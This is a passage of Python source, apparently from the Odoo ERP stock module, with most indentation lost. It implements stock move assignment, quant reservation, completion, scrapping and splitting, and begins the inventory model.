'domain': {'product_uom': [('category_id', '=', product.uom_id.category_id.id)]}
}
return res
def _prepare_picking_assign(self, cr, uid, move, context=None):
""" Prepares a new picking for this move as it could not be assigned to
another picking. This method is designed to be inherited.
"""
values = {
'origin': move.origin,
'company_id': move.company_id and move.company_id.id or False,
'move_type': move.group_id and move.group_id.move_type or 'direct',
'partner_id': move.partner_id.id or False,
'picking_type_id': move.picking_type_id and move.picking_type_id.id or False,
'location_id': move.location_id.id,
'location_dest_id': move.location_dest_id.id,
}
return values
@api.cr_uid_ids_context
def _picking_assign(self, cr, uid, move_ids, context=None):
"""Try to assign the moves to an existing picking
that has not been reserved yet and has the same
procurement group, locations and picking type (moves should already have them identical)
Otherwise, create a new picking to assign them to.
"""
move = self.browse(cr, uid, move_ids, context=context)[0]
pick_obj = self.pool.get("stock.picking")
picks = pick_obj.search(cr, uid, [
('group_id', '=', move.group_id.id),
('location_id', '=', move.location_id.id),
('location_dest_id', '=', move.location_dest_id.id),
('picking_type_id', '=', move.picking_type_id.id),
('printed', '=', False),
('state', 'in', ['draft', 'confirmed', 'waiting', 'partially_available', 'assigned'])], limit=1, context=context)
if picks:
pick = picks[0]
else:
values = self._prepare_picking_assign(cr, uid, move, context=context)
pick = pick_obj.create(cr, uid, values, context=context)
return self.write(cr, uid, move_ids, {'picking_id': pick}, context=context)
def onchange_date(self, cr, uid, ids, date, date_expected, context=None):
""" On change of Scheduled Date gives a Move date.
@param date_expected: Scheduled Date
@param date: Move Date
@return: Move Date
"""
if not date_expected:
date_expected = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return {'value': {'date': date_expected}}
def attribute_price(self, cr, uid, move, context=None):
"""
Attribute price to move, important in inter-company moves or receipts with only one partner
"""
if not move.price_unit:
price = move.product_id.standard_price
self.write(cr, uid, [move.id], {'price_unit': price})
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms stock move or put it in waiting if it's linked to another move.
@return: List of ids.
"""
if not context:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
states = {
'confirmed': [],
'waiting': []
}
to_assign = {}
for move in self.browse(cr, uid, ids, context=context):
self.attribute_price(cr, uid, move, context=context)
state = 'confirmed'
#if the move is preceded, then it's waiting (if the preceding move is done, then action_assign has been called already and its state is already available)
if move.move_orig_ids:
state = 'waiting'
#if the move is split and some of its ancestors were preceded, then it's waiting as well
elif move.split_from:
move2 = move.split_from
while move2 and state != 'waiting':
if move2.move_orig_ids:
state = 'waiting'
move2 = move2.split_from
states[state].append(move.id)
if not move.picking_id and move.picking_type_id:
key = (move.group_id.id, move.location_id.id, move.location_dest_id.id)
if key not in to_assign:
to_assign[key] = []
to_assign[key].append(move.id)
moves = [move for move in self.browse(cr, uid, states['confirmed'], context=context) if move.procure_method == 'make_to_order']
self._create_procurements(cr, uid, moves, context=context)
for move in moves:
states['waiting'].append(move.id)
states['confirmed'].remove(move.id)
for state, write_ids in states.items():
if len(write_ids):
self.write(cr, uid, write_ids, {'state': state}, context=context)
#assign pickings in batch for all confirmed moves that share the same details
for key, move_ids in to_assign.items():
self._picking_assign(cr, uid, move_ids, context=context)
moves = self.browse(cr, uid, ids, context=context)
self._push_apply(cr, uid, moves, context=context)
return ids
def force_assign(self, cr, uid, ids, context=None):
""" Changes the state to assigned.
@return: True
"""
res = self.write(cr, uid, ids, {'state': 'assigned'}, context=context)
self.check_recompute_pack_op(cr, uid, ids, context=context)
return res
def check_tracking(self, cr, uid, move, ops, context=None):
""" Checks if serial number is assigned to stock move or not and raise an error if it had to.
"""
if move.picking_id and (move.picking_id.picking_type_id.use_existing_lots or move.picking_id.picking_type_id.use_create_lots) and \
move.product_id.tracking != 'none':
if not (move.restrict_lot_id or (ops and (ops.product_id and ops.pack_lot_ids)) or (ops and not ops.product_id)):
raise UserError(_('You need to provide a Lot/Serial Number for product %s') % move.product_id.name)
def check_recompute_pack_op(self, cr, uid, ids, context=None):
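""" Prepares pack operations for the pickings of the given moves: pickings that nobody has started
processing are (re)prepared immediately, the others are only flagged for recomputation.
Pickings in 'waiting' or 'confirmed' state are skipped. """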
pickings = list(set([x.picking_id for x in self.browse(cr, uid, ids, context=context) if x.picking_id]))
pickings_partial = []
pickings_write = []
pick_obj = self.pool['stock.picking']
for pick in pickings:
if pick.state in ('waiting', 'confirmed'): #In case of 'all at once' delivery method it should not prepare pack operations
continue
# Check if someone was already processing the picking
if not any([x.qty_done > 0 for x in pick.pack_operation_ids]):
pickings_partial.append(pick.id)
else:
pickings_write.append(pick.id)
if pickings_partial:
pick_obj.do_prepare_partial(cr, uid, pickings_partial, context=context)
if pickings_write:
pick_obj.write(cr, uid, pickings_write, {'recompute_pack_op': True}, context=context)
def action_assign(self, cr, uid, ids, no_prepare=False, context=None):
""" Checks the product type and accordingly writes the state.
"""
context = context or {}
quant_obj = self.pool.get("stock.quant")
uom_obj = self.pool['product.uom']
to_assign_moves = set()
main_domain = {}
todo_moves = []
operations = set()
ancestors_list = {}
self.do_unreserve(cr, uid, [x.id for x in self.browse(cr, uid, ids, context=context) if x.reserved_quant_ids and x.state in ['confirmed', 'waiting', 'assigned']], context=context)
for move in self.browse(cr, uid, ids, context=context):
if move.state not in ('confirmed', 'waiting', 'assigned'):
continue
if move.location_id.usage in ('supplier', 'inventory', 'production'):
to_assign_moves.add(move.id)
#in case the move is returned, we want to try to find quants before forcing the assignment
if not move.origin_returned_move_id:
continue
if move.product_id.type == 'consu':
to_assign_moves.add(move.id)
continue
else:
todo_moves.append(move)
#we always search for yet unassigned quants
main_domain[move.id] = [('reservation_id', '=', False), ('qty', '>', 0)]
#if the move is preceded, restrict the choice of quants to the ones moved previously in the original move
ancestors = self.find_move_ancestors(cr, uid, move, context=context)
ancestors_list[move.id] = True if ancestors else False
if move.state == 'waiting' and not ancestors:
#if the waiting move has no ancestor yet (PO/MO not confirmed yet), don't find any quant available in stock
main_domain[move.id] += [('id', '=', False)]
elif ancestors:
main_domain[move.id] += [('history_ids', 'in', ancestors)]
#if the move is returned from another, restrict the choice of quants to the ones that follow the returned move
if move.origin_returned_move_id:
main_domain[move.id] += [('history_ids', 'in', move.origin_returned_move_id.id)]
for link in move.linked_move_operation_ids:
operations.add(link.operation_id)
# Check all ops and sort them: we want to process the packages first, then operations with lots, then the rest
operations = list(operations)
operations.sort(key=lambda x: ((x.package_id and not x.product_id) and -4 or 0) + (x.package_id and -2 or 0) + (x.pack_lot_ids and -1 or 0))
for ops in operations:
#first try to find quants based on specific domains given by linked operations for the case where we want to rereserve according to existing pack operations
if not (ops.product_id and ops.pack_lot_ids):
for record in ops.linked_move_operation_ids:
move = record.move_id
if move.id in main_domain:
qty = record.qty
domain = main_domain[move.id]
if qty:
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, ops=ops, domain=domain, preferred_domain_list=[], context=context)
quant_obj.quants_reserve(cr, uid, quants, move, record, context=context)
else:
lot_qty = {}
rounding = ops.product_id.uom_id.rounding
for pack_lot in ops.pack_lot_ids:
lot_qty[pack_lot.lot_id.id] = uom_obj._compute_qty(cr, uid, ops.product_uom_id.id, pack_lot.qty, ops.product_id.uom_id.id)
for record in ops.linked_move_operation_ids.filtered(lambda x: x.move_id.id in main_domain):
move_qty = record.qty
move = record.move_id
domain = main_domain[move.id]
for lot in lot_qty:
if float_compare(lot_qty[lot], 0, precision_rounding=rounding) > 0 and float_compare(move_qty, 0, precision_rounding=rounding) > 0:
qty = min(lot_qty[lot], move_qty)
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, ops=ops, lot_id=lot, domain=domain, preferred_domain_list=[], context=context)
quant_obj.quants_reserve(cr, uid, quants, move, record, context=context)
lot_qty[lot] -= qty
move_qty -= qty
# Sort moves to reserve first the ones with ancestors, in case the same product is listed in
# different stock moves.
todo_moves.sort(key=lambda x: -1 if ancestors_list.get(x.id) else 0)
for move in todo_moves:
#then if the move isn't totally assigned, try to find quants without any specific domain
if (move.state != 'assigned') and not context.get("reserve_only_ops"):
qty_already_assigned = move.reserved_availability
qty = move.product_qty - qty_already_assigned
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, domain=main_domain[move.id], preferred_domain_list=[], context=context)
quant_obj.quants_reserve(cr, uid, quants, move, context=context)
#force assignment of consumable products and incoming from supplier/inventory/production
# Do not take force_assign as it would create pack operations
if to_assign_moves:
self.write(cr, uid, list(to_assign_moves), {'state': 'assigned'}, context=context)
if not no_prepare:
self.check_recompute_pack_op(cr, uid, ids, context=context)
def action_cancel(self, cr, uid, ids, context=None):
""" Cancels the moves and if all moves are cancelled it cancels the picking.
@return: True
"""
procurement_obj = self.pool.get('procurement.order')
context = context or {}
procs_to_check = set()
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
raise UserError(_('You cannot cancel a stock move that has been set to \'Done\'.'))
if move.reserved_quant_ids:
self.pool.get("stock.quant").quants_unreserve(cr, uid, move, context=context)
if context.get('cancel_procurement'):
if move.propagate:
procurement_ids = procurement_obj.search(cr, uid, [('move_dest_id', '=', move.id)], context=context)
procurement_obj.cancel(cr, uid, procurement_ids, context=context)
else:
if move.move_dest_id:
if move.propagate:
self.action_cancel(cr, uid, [move.move_dest_id.id], context=context)
elif move.move_dest_id.state == 'waiting':
#If waiting, the chain will be broken and we are not sure if we can still wait for it (=> could take from stock instead)
self.write(cr, uid, [move.move_dest_id.id], {'state': 'confirmed'}, context=context)
if move.procurement_id:
# Does the same as procurement check, only eliminating a refresh
procs_to_check.add(move.procurement_id.id)
res = self.write(cr, uid, ids, {'state': 'cancel', 'move_dest_id': False}, context=context)
if procs_to_check:
procurement_obj.check(cr, uid, list(procs_to_check), context=context)
return res
def _check_package_from_moves(self, cr, uid, ids, context=None):
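""" Checks the location constraint on the packages containing the quants moved by the given moves. """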
pack_obj = self.pool.get("stock.quant.package")
packs = set()
for move in self.browse(cr, uid, ids, context=context):
packs |= set([q.package_id for q in move.quant_ids if q.package_id and q.qty > 0])
return pack_obj._check_location_constraint(cr, uid, list(packs), context=context)
def find_move_ancestors(self, cr, uid, move, context=None):
'''Find the first level ancestors of given move '''
ancestors = []
move2 = move
while move2:
ancestors += [x.id for x in move2.move_orig_ids]
#loop on the split_from to find the ancestor of split moves only if the move has no direct ancestor (priority goes to them)
move2 = not move2.move_orig_ids and move2.split_from or False
return ancestors
@api.cr_uid_ids_context
def recalculate_move_state(self, cr, uid, move_ids, context=None):
'''Recompute the state of the given moves because their reserved quants were used to fulfill another operation'''
for move in self.browse(cr, uid, move_ids, context=context):
vals = {}
reserved_quant_ids = move.reserved_quant_ids
if len(reserved_quant_ids) > 0 and not move.partially_available:
vals['partially_available'] = True
if len(reserved_quant_ids) == 0 and move.partially_available:
vals['partially_available'] = False
if move.state == 'assigned':
if self.find_move_ancestors(cr, uid, move, context=context):
vals['state'] = 'waiting'
else:
vals['state'] = 'confirmed'
if vals:
self.write(cr, uid, [move.id], vals, context=context)
def _move_quants_by_lot(self, cr, uid, ops, lot_qty, quants_taken, false_quants, lot_move_qty, quant_dest_package_id, context=None):
"""
This function is used to process all the pack operation lots of a pack operation
For every move:
First, we check the quants with lot already reserved (and those are already subtracted from the lots to do)
Then go through all the lots to process:
Add reserved false lots lot by lot
Check for quants that are not reserved, or reserved elsewhere, with that lot or without a lot (with the traditional method)
"""
quant_obj = self.pool['stock.quant']
fallback_domain = [('reservation_id', '=', False)]
fallback_domain2 = ['&', ('reservation_id', 'not in', [x for x in lot_move_qty.keys()]), ('reservation_id', '!=', False)]
preferred_domain_list = [fallback_domain] + [fallback_domain2]
rounding = ops.product_id.uom_id.rounding
for move in lot_move_qty:
move_quants_dict = {}
move_rec = self.pool['stock.move'].browse(cr, uid, move, context=context)
# Assign quants already reserved with a lot to the correct move
for quant in quants_taken:
if quant[0] <= move_rec.reserved_quant_ids:
move_quants_dict.setdefault(quant[0].lot_id.id, [])
move_quants_dict[quant[0].lot_id.id] += [quant]
false_quants_move = [x for x in false_quants if x[0].reservation_id.id == move]
for lot in lot_qty:
move_quants_dict.setdefault(lot, [])
redo_false_quants = False
# Take remaining reserved quants with no lot first
# (This will be used mainly when the incoming move had no lot and the outgoing is done with one)
while false_quants_move and float_compare(lot_qty[lot], 0, precision_rounding=rounding) > 0 and float_compare(lot_move_qty[move], 0, precision_rounding=rounding) > 0:
qty_min = min(lot_qty[lot], lot_move_qty[move])
if false_quants_move[0].qty > qty_min:
move_quants_dict[lot] += [(false_quants_move[0], qty_min)]
qty = qty_min
redo_false_quants = True
else:
qty = false_quants_move[0].qty
move_quants_dict[lot] += [(false_quants_move[0], qty)]
false_quants_move.pop(0)
lot_qty[lot] -= qty
lot_move_qty[move] -= qty
# Search other with first matching lots and then without lots
if float_compare(lot_move_qty[move], 0, precision_rounding=rounding) > 0 and float_compare(lot_qty[lot], 0, precision_rounding=rounding) > 0:
# Search if we can find quants with that lot
domain = [('qty', '>', 0)]
qty = min(lot_qty[lot], lot_move_qty[move])
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move_rec, ops=ops, lot_id=lot, domain=domain,
preferred_domain_list=preferred_domain_list, context=context)
move_quants_dict[lot] += quants
lot_qty[lot] -= qty
lot_move_qty[move] -= qty
#Move all the quants related to that lot/move
if move_quants_dict[lot]:
quant_obj.quants_move(cr, uid, move_quants_dict[lot], move_rec, ops.location_dest_id, location_from=ops.location_id,
lot_id=lot, owner_id=ops.owner_id.id, src_package_id=ops.package_id.id,
dest_package_id=quant_dest_package_id, context=context)
if redo_false_quants:
move_rec = self.pool['stock.move'].browse(cr, uid, move, context=context)
false_quants_move = [x for x in move_rec.reserved_quant_ids if (not x.lot_id) and (x.owner_id.id == ops.owner_id.id) \
and (x.location_id.id == ops.location_id.id) and (x.package_id.id == ops.package_id.id)]
def action_done(self, cr, uid, ids, context=None):
""" Process completely the moves given as ids and if all moves are done, it will finish the picking.
"""
context = context or {}
picking_obj = self.pool.get("stock.picking")
quant_obj = self.pool.get("stock.quant")
uom_obj = self.pool.get("product.uom")
todo = [move.id for move in self.browse(cr, uid, ids, context=context) if move.state == "draft"]
if todo:
ids = self.action_confirm(cr, uid, todo, context=context)
pickings = set()
procurement_ids = set()
#Search operations that are linked to the moves
operations = set()
move_qty = {}
for move in self.browse(cr, uid, ids, context=context):
if move.picking_id:
pickings.add(move.picking_id.id)
move_qty[move.id] = move.product_qty
for link in move.linked_move_operation_ids:
operations.add(link.operation_id)
#Sort operations according to entire packages first, then package + lot, package only, lot only
operations = list(operations)
operations.sort(key=lambda x: ((x.package_id and not x.product_id) and -4 or 0) + (x.package_id and -2 or 0) + (x.pack_lot_ids and -1 or 0))
for ops in operations:
if ops.picking_id:
pickings.add(ops.picking_id.id)
entire_pack=False
if ops.product_id:
#If a product is given, the result is always put immediately in the result package (if it is False, they are without package)
quant_dest_package_id = ops.result_package_id.id
else:
# When a pack is moved entirely, no destination package should be written on the quants
quant_dest_package_id = False
entire_pack=True
lot_qty = {}
tot_qty = 0.0
for pack_lot in ops.pack_lot_ids:
qty = uom_obj._compute_qty(cr, uid, ops.product_uom_id.id, pack_lot.qty, ops.product_id.uom_id.id)
lot_qty[pack_lot.lot_id.id] = qty
tot_qty += pack_lot.qty
if ops.pack_lot_ids and ops.product_id and float_compare(tot_qty, ops.product_qty, precision_rounding=ops.product_uom_id.rounding) != 0.0:
raise UserError(_('You have a difference between the quantity on the operation and the quantities specified for the lots. '))
quants_taken = []
false_quants = []
lot_move_qty = {}
#Group links by move first
move_qty_ops = {}
for record in ops.linked_move_operation_ids:
move = record.move_id
if not move_qty_ops.get(move):
move_qty_ops[move] = record.qty
else:
move_qty_ops[move] += record.qty
#Process every move only once for every pack operation
for move in move_qty_ops:
main_domain = [('qty', '>', 0)]
self.check_tracking(cr, uid, move, ops, context=context)
preferred_domain = [('reservation_id', '=', move.id)]
fallback_domain = [('reservation_id', '=', False)]
fallback_domain2 = ['&', ('reservation_id', '!=', move.id), ('reservation_id', '!=', False)]
if not ops.pack_lot_ids:
preferred_domain_list = [preferred_domain] + [fallback_domain] + [fallback_domain2]
quants = quant_obj.quants_get_preferred_domain(cr, uid, move_qty_ops[move], move, ops=ops, domain=main_domain,
preferred_domain_list=preferred_domain_list, context=context)
quant_obj.quants_move(cr, uid, quants, move, ops.location_dest_id, location_from=ops.location_id,
lot_id=False, owner_id=ops.owner_id.id, src_package_id=ops.package_id.id,
dest_package_id=quant_dest_package_id, entire_pack=entire_pack, context=context)
else:
                    # Check what can already be done with the reserved quants
qty_on_link = move_qty_ops[move]
rounding = ops.product_id.uom_id.rounding
for reserved_quant in move.reserved_quant_ids:
if (reserved_quant.owner_id.id != ops.owner_id.id) or (reserved_quant.location_id.id != ops.location_id.id) or \
(reserved_quant.package_id.id != ops.package_id.id):
continue
if not reserved_quant.lot_id:
false_quants += [reserved_quant]
elif float_compare(lot_qty.get(reserved_quant.lot_id.id, 0), 0, precision_rounding=rounding) > 0:
if float_compare(lot_qty[reserved_quant.lot_id.id], reserved_quant.qty, precision_rounding=rounding) >= 0:
lot_qty[reserved_quant.lot_id.id] -= reserved_quant.qty
quants_taken += [(reserved_quant, reserved_quant.qty)]
qty_on_link -= reserved_quant.qty
else:
quants_taken += [(reserved_quant, lot_qty[reserved_quant.lot_id.id])]
lot_qty[reserved_quant.lot_id.id] = 0
qty_on_link -= lot_qty[reserved_quant.lot_id.id]
lot_move_qty[move.id] = qty_on_link
if not move_qty.get(move.id):
raise UserError(_("The roundings of your Unit of Measures %s on the move vs. %s on the product don't allow to do these operations or you are not transferring the picking at once. ") % (move.product_uom.name, move.product_id.uom_id.name))
move_qty[move.id] -= move_qty_ops[move]
#Handle lots separately
if ops.pack_lot_ids:
self._move_quants_by_lot(cr, uid, ops, lot_qty, quants_taken, false_quants, lot_move_qty, quant_dest_package_id, context=context)
# Handle pack in pack
if not ops.product_id and ops.package_id and ops.result_package_id.id != ops.package_id.parent_id.id:
self.pool.get('stock.quant.package').write(cr, SUPERUSER_ID, [ops.package_id.id], {'parent_id': ops.result_package_id.id}, context=context)
        #Check for remaining quantities and unreserve the quants / collect the move_dest_id to assign later
move_dest_ids = set()
for move in self.browse(cr, uid, ids, context=context):
move_qty_cmp = float_compare(move_qty[move.id], 0, precision_rounding=move.product_id.uom_id.rounding)
if move_qty_cmp > 0: # (=In case no pack operations in picking)
main_domain = [('qty', '>', 0)]
preferred_domain = [('reservation_id', '=', move.id)]
fallback_domain = [('reservation_id', '=', False)]
fallback_domain2 = ['&', ('reservation_id', '!=', move.id), ('reservation_id', '!=', False)]
preferred_domain_list = [preferred_domain] + [fallback_domain] + [fallback_domain2]
self.check_tracking(cr, uid, move, False, context=context)
qty = move_qty[move.id]
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, domain=main_domain, preferred_domain_list=preferred_domain_list, context=context)
quant_obj.quants_move(cr, uid, quants, move, move.location_dest_id, lot_id=move.restrict_lot_id.id, owner_id=move.restrict_partner_id.id, context=context)
# If the move has a destination, add it to the list to reserve
if move.move_dest_id and move.move_dest_id.state in ('waiting', 'confirmed'):
move_dest_ids.add(move.move_dest_id.id)
if move.procurement_id:
procurement_ids.add(move.procurement_id.id)
#unreserve the quants and make them available for other operations/moves
quant_obj.quants_unreserve(cr, uid, move, context=context)
# Check the packages have been placed in the correct locations
self._check_package_from_moves(cr, uid, ids, context=context)
#set the move as done
self.write(cr, uid, ids, {'state': 'done', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
self.pool.get('procurement.order').check(cr, uid, list(procurement_ids), context=context)
#assign destination moves
if move_dest_ids:
self.action_assign(cr, uid, list(move_dest_ids), context=context)
        #check picking state to set the date_done if needed
done_picking = []
for picking in picking_obj.browse(cr, uid, list(pickings), context=context):
if picking.state == 'done' and not picking.date_done:
done_picking.append(picking.id)
if done_picking:
picking_obj.write(cr, uid, done_picking, {'date_done': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
return True
def unlink(self, cr, uid, ids, context=None):
context = context or {}
for move in self.browse(cr, uid, ids, context=context):
if move.state not in ('draft', 'cancel'):
raise UserError(_('You can only delete draft moves.'))
return super(stock_move, self).unlink(cr, uid, ids, context=context)
def action_scrap(self, cr, uid, ids, quantity, location_id, restrict_lot_id=False, restrict_partner_id=False, context=None):
""" Move the scrap/damaged product into scrap location
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be scrapped
@param quantity : specify scrap qty
@param location_id : specify scrap location
@param context: context arguments
        @return: ids of the created scrap moves
"""
quant_obj = self.pool.get("stock.quant")
#quantity should be given in MOVE UOM
if quantity <= 0:
raise UserError(_('Please provide a positive quantity to scrap.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
source_location = move.location_id
if move.state == 'done':
source_location = move.location_dest_id
            #Previously used to prevent scrapping from a virtual location, but not necessary anymore
#if source_location.usage != 'internal':
#restrict to scrap from a virtual location because it's meaningless and it may introduce errors in stock ('creating' new products from nowhere)
#raise UserError(_('Forbidden operation: it is not allowed to scrap products from a virtual location.'))
move_qty = move.product_qty
default_val = {
'location_id': source_location.id,
'product_uom_qty': quantity,
'state': move.state,
'scrapped': True,
'location_dest_id': location_id,
'restrict_lot_id': restrict_lot_id,
'restrict_partner_id': restrict_partner_id,
}
new_move = self.copy(cr, uid, move.id, default_val)
res += [new_move]
product_obj = self.pool.get('product.product')
for product in product_obj.browse(cr, uid, [move.product_id.id], context=context):
if move.picking_id:
uom = product.uom_id.name if product.uom_id else ''
message = _("%s %s %s has been <b>moved to</b> scrap.") % (quantity, uom, product.name)
move.picking_id.message_post(body=message)
# We "flag" the quant from which we want to scrap the products. To do so:
# - we select the quants related to the move we scrap from
# - we reserve the quants with the scrapped move
            # See self.action_done and, in particular, how the "preferred_domain" is defined, for clarification
scrap_move = self.browse(cr, uid, new_move, context=context)
if move.state == 'done' and scrap_move.location_id.usage not in ('supplier', 'inventory', 'production'):
domain = [('qty', '>', 0), ('history_ids', 'in', [move.id])]
# We use scrap_move data since a reservation makes sense for a move not already done
quants = quant_obj.quants_get_preferred_domain(cr, uid, quantity, scrap_move, domain=domain, context=context)
quant_obj.quants_reserve(cr, uid, quants, scrap_move, context=context)
self.action_done(cr, uid, res, context=context)
return res
def split(self, cr, uid, move, qty, restrict_lot_id=False, restrict_partner_id=False, context=None):
""" Splits qty from move move into a new move
:param move: browse record
:param qty: float. quantity to split (given in product UoM)
:param restrict_lot_id: optional production lot that can be given in order to force the new move to restrict its choice of quants to this lot.
:param restrict_partner_id: optional partner that can be given in order to force the new move to restrict its choice of quants to the ones belonging to this partner.
        :param context: dictionary. May contain the special key 'source_location_id' in order to force the source location when copying the move
        :returns: the ID of the backorder move created
"""
if move.state in ('done', 'cancel'):
            raise UserError(_('You cannot split a move that is already done.'))
if move.state == 'draft':
            #splitting a draft move is forbidden because, as long as it is not confirmed, it may still be replaced by several
            #other moves (phantom BoM explosion with the mrp module), and we do not want to handle that complexity on the copy.
raise UserError(_('You cannot split a draft move. It needs to be confirmed first.'))
if move.product_qty <= qty or qty == 0:
return move.id
uom_obj = self.pool.get('product.uom')
context = context or {}
        #HALF-UP rounding: the only rounding errors come from the propagation of the error from the default UoM
uom_qty = uom_obj._compute_qty_obj(cr, uid, move.product_id.uom_id, qty, move.product_uom, rounding_method='HALF-UP', context=context)
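        # Example of the conversion above (assuming a move expressed in dozens and a 0.01 UoM
        # rounding): splitting qty=5.0 units gives uom_qty = 5/12 ~= 0.4167, rounded HALF-UP to 0.42 dozen.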
defaults = {
'product_uom_qty': uom_qty,
'procure_method': 'make_to_stock',
'restrict_lot_id': restrict_lot_id,
'split_from': move.id,
'procurement_id': move.procurement_id.id,
'move_dest_id': move.move_dest_id.id,
'origin_returned_move_id': move.origin_returned_move_id.id,
}
if restrict_partner_id:
defaults['restrict_partner_id'] = restrict_partner_id
if context.get('source_location_id'):
defaults['location_id'] = context['source_location_id']
new_move = self.copy(cr, uid, move.id, defaults, context=context)
ctx = context.copy()
ctx['do_not_propagate'] = True
self.write(cr, uid, [move.id], {
'product_uom_qty': move.product_uom_qty - uom_qty,
}, context=ctx)
if move.move_dest_id and move.propagate and move.move_dest_id.state not in ('done', 'cancel'):
new_move_prop = self.split(cr, uid, move.move_dest_id, qty, context=context)
self.write(cr, uid, [new_move], {'move_dest_id': new_move_prop}, context=context)
        #returning the first element of the list returned by action_confirm is ok because we checked the move won't be exploded
        #(and thus action_confirm should always return a list of length 1)
return self.action_confirm(cr, uid, [new_move], context=context)[0]
def get_code_from_locs(self, cr, uid, move, location_id=False, location_dest_id=False, context=None):
"""
Returns the code the picking type should have. This can easily be used
to check if a move is internal or not
move, location_id and location_dest_id are browse records
"""
code = 'internal'
src_loc = location_id or move.location_id
dest_loc = location_dest_id or move.location_dest_id
if src_loc.usage == 'internal' and dest_loc.usage != 'internal':
code = 'outgoing'
if src_loc.usage != 'internal' and dest_loc.usage == 'internal':
code = 'incoming'
return code
def show_picking(self, cr, uid, ids, context=None):
assert len(ids) > 0
picking_id = self.browse(cr, uid, ids[0], context=context).picking_id.id
if picking_id:
data_obj = self.pool['ir.model.data']
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_picking_form')
return {
'name': _('Transfer'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.picking',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': picking_id,
}
class stock_inventory(osv.osv):
_name = "stock.inventory"
_description = "Inventory"
def _get_move_ids_exist(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for inv in self.browse(cr, uid, ids, context=context):
res[inv.id] = False
if inv.move_ids:
res[inv.id] = True
return res
def _get_available_filters(self, cr, uid, context=None):
"""
        This function returns the list of filters allowed according to the options checked
        in 'Settings > Warehouse'.
:rtype: list of tuple
"""
#default available choices
res_filter = [('none', _('All products')), ('partial', _('Select products manually')), ('product', _('One product only'))]
if self.pool.get('res.users').has_group(cr, uid, 'stock.group_tracking_owner'):
res_filter.append(('owner', _('One owner only')))
res_filter.append(('product_owner', _('One product for a specific owner')))
if self.pool.get('res.users').has_group(cr, uid, 'stock.group_production_lot'):
res_filter.append(('lot', _('One Lot/Serial Number')))
if self.pool.get('res.users').has_group(cr, uid, 'stock.group_tracking_lot'):
res_filter.append(('pack', _('A Pack')))
return res_filter
def _get_total_qty(self, cr, uid, ids, field_name, args, context=None):
res = {}
for inv in self.browse(cr, uid, ids, context=context):
res[inv.id] = sum([x.product_qty for x in inv.line_ids])
return res
INVENTORY_STATE_SELECTION = [
('draft', 'Draft'),
('cancel', 'Cancelled'),
('confirm', 'In Progress'),
('done', 'Validated'),
]
_columns = {
'name': fields.char('Inventory Reference', required=True, readonly=True, states={'draft': [('readonly', False)]}, help="Inventory Name."),
'date': fields.datetime('Inventory Date', required=True, readonly=True, help="The date that will be used for the stock level check of the products and the validation of the stock move related to this inventory."),
'line_ids': fields.one2many('stock.inventory.line', 'inventory_id', 'Inventories', readonly=False, states={'done': [('readonly', True)]}, help="Inventory Lines.", copy=True),
'move_ids': fields.one2many('stock.move', 'inventory_id', 'Created Moves', help="Inventory Moves.", states={'done': [('readonly', True)]}),
'state': fields.selection(INVENTORY_STATE_SELECTION, 'Status', readonly=True, select=True, copy=False),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, readonly=True, states={'draft': [('readonly', False)]}),
'location_id': fields.many2one('stock.location', 'Inventoried Location', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_id': fields.many2one('product.product', 'Inventoried Product', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Product to focus your inventory on a particular Product."),
'package_id': fields.many2one('stock.quant.package', 'Inventoried Pack', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Pack to focus your inventory on a particular Pack."),
'partner_id': fields.many2one('res.partner', 'Inventoried Owner', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Owner to focus your inventory on a particular Owner."),
'lot_id': fields.many2one('stock.production.lot', 'Inventoried Lot/Serial Number', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Lot/Serial Number to focus your inventory on a particular Lot/Serial Number.", copy=False),
# technical field for attrs in view
        'move_ids_exist': fields.function(_get_move_ids_exist, type='boolean', string='Has Stock Moves', help='Check the existence of stock moves linked to this inventory'),
'filter': fields.selection(_get_available_filters, 'Inventory of', required=True,
help="If you do an entire inventory, you can choose 'All Products' and it will prefill the inventory with the current stock. If you only do some products "\
"(e.g. Cycle Counting) you can choose 'Manual Selection of Products' and the system won't propose anything. You can also let the "\
"system propose for a single product / lot /... "),
'total_qty': fields.function(_get_total_qty, type="float"),
}
def _default_stock_location(self, cr, uid, context=None):
try:
warehouse = self.pool.get('ir.model.data').get_object(cr, uid, 'stock', 'warehouse0')
return warehouse.lot_stock_id.id
except:
return False
_defaults = {
'date': fields.datetime.now,
'state': 'draft',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
'location_id': _default_stock_location,
'filter': 'none',
}
@api.onchange('location_id')
def onchange_location_id(self):
if self.location_id.company_id:
self.company_id = self.location_id.company_id
def reset_real_qty(self, cr, uid, ids, context=None):
inventory = self.browse(cr, uid, ids[0], context=context)
line_ids = [line.id for line in inventory.line_ids]
self.pool.get('stock.inventory.line').write(cr, uid, line_ids, {'product_qty': 0})
return True
def action_done(self, cr, uid, ids, context=None):
""" Finish the inventory
@return: True
"""
for inv in self.browse(cr, uid, ids, context=context):
for inventory_line in inv.line_ids:
if inventory_line.product_qty < 0 and inventory_line.product_qty != inventory_line.theoretical_qty:
raise UserError(_('You cannot set a negative product quantity in an inventory line:\n\t%s - qty: %s') % (inventory_line.product_id.name, inventory_line.product_qty))
self.action_check(cr, uid, [inv.id], context=context)
